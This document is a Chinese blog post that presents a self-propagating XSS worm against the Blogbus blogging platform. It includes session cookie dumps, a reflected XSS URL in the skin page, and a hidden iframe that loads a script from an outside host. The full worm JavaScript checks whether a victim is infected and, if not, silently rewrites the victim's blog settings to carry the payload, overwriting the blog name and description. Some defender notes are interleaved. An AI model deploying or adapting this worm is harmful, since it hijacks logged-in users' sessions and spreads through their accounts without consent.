Blogbus蠕虫

本来以为很简单的。测试碰到了不少问题。
后台管理为:http://www.blogbus.com/user/
前台XSS为:http://xxx.blogbus.com
需要跨域。直接使用COOKIE提交缺少session_id。
博客主页cookie:

—————————
Windows Internet Explorer
—————————
__utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F
—————————
确定  
—————————

后台cookie:

—————————
Windows Internet Explorer
—————————
blogbus_as_hash=4be67586fb028479bc7c8e8d105d37a6; __utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F; bus_sessid=bf414d9e43c1a75274de5ab2c09567db
—————————
确定  
—————————

偷懒找到一个非持久的XSS,刚好cookie里包含了session_id

http://www.blogbus.com/skin/?style=< … script>

后面就简单了:
http://www.blogbus.com/user/?mm=Setting
页面允许写入任意JS，前台执行。我们用一个隐藏框架将非持久XSS转换为持久XSS。

最后贴上exp,很多bug,写的匆忙,将所有的选项都直接修改了。

<iframe style="display:none" src="http://www.blogbus.com/skin/?style=<SCRIPT%20src=’http://www.delover.net/bus.js’></SCRIPT>"></iframe>
bus.js

// Returns an XHR-capable object: the legacy IE ActiveX control first,
// the native XMLHttpRequest second, and `false` when neither constructor
// is available (same contract as the original three-way try/catch).
function createAjax() {
    var factories = [
        function () { return new ActiveXObject("Microsoft.XMLHTTP"); },
        function () { return new XMLHttpRequest(); }
    ];
    for (var i = 0; i < factories.length; i++) {
        try {
            return factories[i]();
        } catch (e) {
            // constructor missing in this runtime; fall through to the next one
        }
    }
    return false;
}

//javascript:alert(document.cookie)

// Checks whether the current victim's blog settings already carry the payload,
// and calls AddNew() if they do not. It runs in the victim's browser on the
// www.blogbus.com origin, so the XHR to the authenticated /user/ page is
// same-origin and the browser attaches the session cookie automatically
// (the cookie dump above shows bus_sessid scoped to the site).
// Defender note: because the script is same-origin with the admin area, an
// anti-CSRF token alone would not stop this (the script could read the token
// from the page it fetches here); the effective fixes are on the injection
// points — HTML-encoding the `style` parameter on /skin/ and not serving an
// unauthenticated reflective endpoint from the same origin as /user/.
// The blogid is hard-coded to one blog; whether the server ignores it for
// other users is not shown here — TODO confirm.
function GetTag() {
    var xmlhttp=createAjax();
    if (xmlhttp) {
        // Trailing random query parameter is a cache-buster.
        // NOTE: the typographic quotes (‘ ’) on this line are a rendering
        // artefact of the blog; as pasted, this line is not valid JS.
        xmlhttp.open(‘get’,’/user/?blogid=4884256&mm=Setting&n=’+Math.random(),true);
        xmlhttp.onreadystatechange=function() {
            if (xmlhttp.readyState==4 && xmlhttp.status==200) {
                // Infection marker: the saved settings already reference the
                // /skin/ payload URL. The second string (img_regbtn.gif) is
                // presumably a login/registration page, i.e. the user is not
                // logged in — TODO confirm; either way, nothing more is done.
                if (unescape(xmlhttp.responseText).indexOf("www.blogbus.com/skin")>=0 || unescape(xmlhttp.responseText).indexOf("img_regbtn.gif")>=0){
                    // already propagated (or not logged in): do nothing
                }else{
                    AddNew();
                }
            }
        }
        xmlhttp.send(null);
    }
}

// Writes the payload into the victim's blog settings via an authenticated
// same-origin POST to /user/?mm=Setting&aa=Save. GuestInfo is a URL-encoded
// form body; its Meta field decodes to the same hidden <iframe> shown above
// the script (src = /skin/?style=<SCRIPT src=…/bus.js>, here hosted on
// delover.net rather than www.delover.net), and Submit decodes to
// "保存设置" ("save settings"). BlogName and Description are also sent, so the
// victim's blog name and description are overwritten with "jackal" — the
// "modified all the options" remark in the write-up.
// Defender note: this is the stored half of the worm. A Meta setting that
// contains an <iframe> pointing at /skin/?style= is the indicator to search
// for in stored settings; the mitigation is to restrict the Meta field to an
// allow-list of tags/attributes instead of accepting arbitrary HTML.
function AddNew() {
    var xmlhttp=createAjax();
    if (xmlhttp) {   

        var GuestInfo="BlogName=jackal&Description=jackal&AccessPwd=&Meta=%3Ciframe+style%3D%22display%3Anone%22+src%3D%22http%3A%2F%2Fwww.blogbus.com%2Fskin%2F%3Fstyle%3D%3CSCRIPT%2520src%3D%27http%3A%2F%2Fdelover.net%2Fbus.js%27%3E%3C%2FSCRIPT%3E%22%3E%3C%2Fiframe%3E&Submit=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE";
        //debug
        //alert(GuestInfo);
        // NOTE: the typographic quotes (‘ ’) on this line are a rendering
        // artefact of the blog; as pasted, this line is not valid JS.
        xmlhttp.open(‘post’,’/user/?mm=Setting&aa=Save&n=’+Math.random(),true);
        xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        xmlhttp.onreadystatechange=function() {
            if (xmlhttp.readyState==4 && xmlhttp.status==200) {
                // Response is ignored; the alert below was only for debugging.
                //alert(unescape(xmlhttp.responseText));
            }
        }
        xmlhttp.send(GuestInfo);
    }
}

// Entry point: runs as soon as bus.js loads inside the hidden iframe on /skin/.
GetTag();
测试地址:http://delover.blogbus.com/
